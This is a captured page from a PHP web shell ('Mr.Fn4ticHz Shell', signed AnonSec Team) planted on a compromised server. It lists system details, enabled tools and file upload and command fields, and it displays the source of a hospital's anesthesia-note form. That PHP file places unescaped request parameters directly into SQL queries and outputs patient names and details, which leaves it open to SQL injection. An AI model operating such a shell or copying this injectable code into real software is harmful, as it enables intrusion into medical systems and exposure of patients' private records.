Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.118.24.30
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//Anesthesia_Note1.php
<?php session_start();
include 'dbconnection.php';
require_once("../patientmanager.php");
require_once("../DBManager.php");
if(isset($_POST['submit'])) 
{
   PatientManager::Anesthesianote("$_GET[prescriptionid]","$_GET[patientid]","$_GET[surgeryid]","$_POST[Name_Anesthetist]","$_POST[Name_of_Surgeon]","$_POST[member_1]","$_POST[member_2]","$_POST[Proposed_Surgery]","$_POST[Duration]","$_POST[Duration_time]","$_POST[Pre_Operative_Diagnosis]","$_POST[Anesthesia_Type]","$_POST[Procedure_Executed]","$_POST[Procedure_performed]","$_POST[Surgeon_Note]","$_POST[Anesthetic_Note]","$_POST[Patient_Status]","$_POST[Expected_Outcome]","$_POST[Record_time_Death]","$_POST[Revesalr]","$_POST[Post_Op_advice]","$_POST[entered_by]","$_POST[SignIn]","$_POST[SignOut]");
}
?>



<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script>
$(document).ready(function(){
    $("select").change(function(){
        $(this).find("option:selected").each(function(){
            var optionValue = $(this).attr("value");
            if(optionValue){
                $(".box").not("." + optionValue).hide();
                $("." + optionValue).show();
            } else{
                $(".box").hide();
            }
        });
    }).change();
});
$(document).ready(function(){
    $("select").change(function(){
        $(this).find("option:selected").each(function(){
            var optionValue = $(this).attr("value");
            if(optionValue){
                $(".babyya").not("." + optionValue).hide();
                $("." + optionValue).show();
            } else{
                $(".babyya").hide();
            }
        });
    }).change();
});
function myFunction102() {
  var checkBox = document.getElementById("myCheck102");
  var text = document.getElementById("text102");
  if (checkBox.checked == true){
    text.style.display = "block";
  } else {
     text.style.display = "none";
  }
}
</script>

		<div class="center">
<?php 
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
		$sql ="SELECT * FROM patient WHERE patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		    echo "

		    <div class=''>
    <!-- Content Header (Page header) -->
    <section class='content-header' style='width:100%;'>
    <table class='table table-bordered table-hover'>
<legend>Operative Note</legend>
<tr>
<td >&nbsp;  &nbsp; &nbsp; &nbsp; Pt. Name: </td>
<td >$rs[patientname]</td>
</tr>
<tr>
<td >&nbsp;  &nbsp; &nbsp; &nbsp;  W/O,D/O,S/O. :  </td>
<td >$rs[HusbandName]</td>
</tr>
<tr>
<td > &nbsp;  &nbsp; &nbsp; &nbsp; Age:  </td>
<td >$rs[dob]</td>
</tr>
<tr>
<td >&nbsp;  &nbsp; &nbsp; &nbsp; Sex : </td>
<td >$rs[gendor]</td>
</tr>
 ";
	  echo "</td></tr>";	}
		?>
<form name='submit' method='post'>
 
                 
        </table>
        <table class='table table-bordered table-hover'> 
<tr><td></td></tr>        
</table>
<br>
      <table class='table table-bordered table-hover' style="width:100%;">
     
   <tr>
<td>Procedure Executed : </td><td>
<input type='text' placeholder='Procedure Executed' name='Procedure_Executed'>
</td>
</tr>

  <tr>
<td>Detail of Emergency procedure performed:  </h3></td><td>
<input type='text' placeholder='Detail of Emergency procedure performed' name='Procedure_performed'>
</td>
</tr>

  <tr>
<td>Surgeon Note :  </h3></td><td>
<textarea name="Surgeon_Note" rows="2" cols="70">
</textarea>
</td>
</tr>

 <tr>
<td>Anesthetic Note :  </h3></td><td>
<textarea name="Anesthetic_Note" rows="2" cols="70">
</textarea>
</td>
</tr>
 <tr>

  <tr>
 <td style='width:50%'>Patient Status:  
 </td>
 <td style='width:50%'>
 <select name="Patient_Status">
 <option value="Under Observation">Under Observation </option>
  <option value="Successful and Stable">Successful and Stable  </option>
   <option value="Critical and Unstable">Critical and Unstable </option>
    <option value="Dead">Dead </option>
 </select>
 </td>
 </tr>
 
  <tr>
 <td style='width:50%'>Expected Outcome:  
 </td>
 <td style='width:50%'>
 <select name="Expected_Outcome">
 <option value="Good">Good </option>
  <option value="Fair">Fair  </option>
   <option value="Poor">Poor</option>
 </select>
 </td>
 </tr>
 
  <tr>
<td>Record time of Death : </h3></td><td>
<input type='text' placeholder='Record time of Death' name='Record_time_Death'>
</td>
</tr>


  <tr>
<td>Reversal : </h3></td><td>
<textarea name="Revesalr" rows="3" cols="70">
</textarea>
</td>
</tr>


  <tr>
<td>Post Op. advice:  </h3></td><td>
<textarea name="Post_Op_advice" rows="3" cols="70">
</textarea>
</td>
</tr>


 <tr>
<td>Sign In :  </h3></td><td>
<input type='time' placeholder='Sign In' name='SignIn'>
</td>
</tr>

 <tr>
<td>Sign Out:  </h3></td><td>
<input type='time' placeholder='Sign Out' name='SignOut'>
</td>
</tr>


</table>
  
<input type="submit" name="submit" value="Submit"> 
</form>
		</div>

Anon7 - 2022
AnonSec Team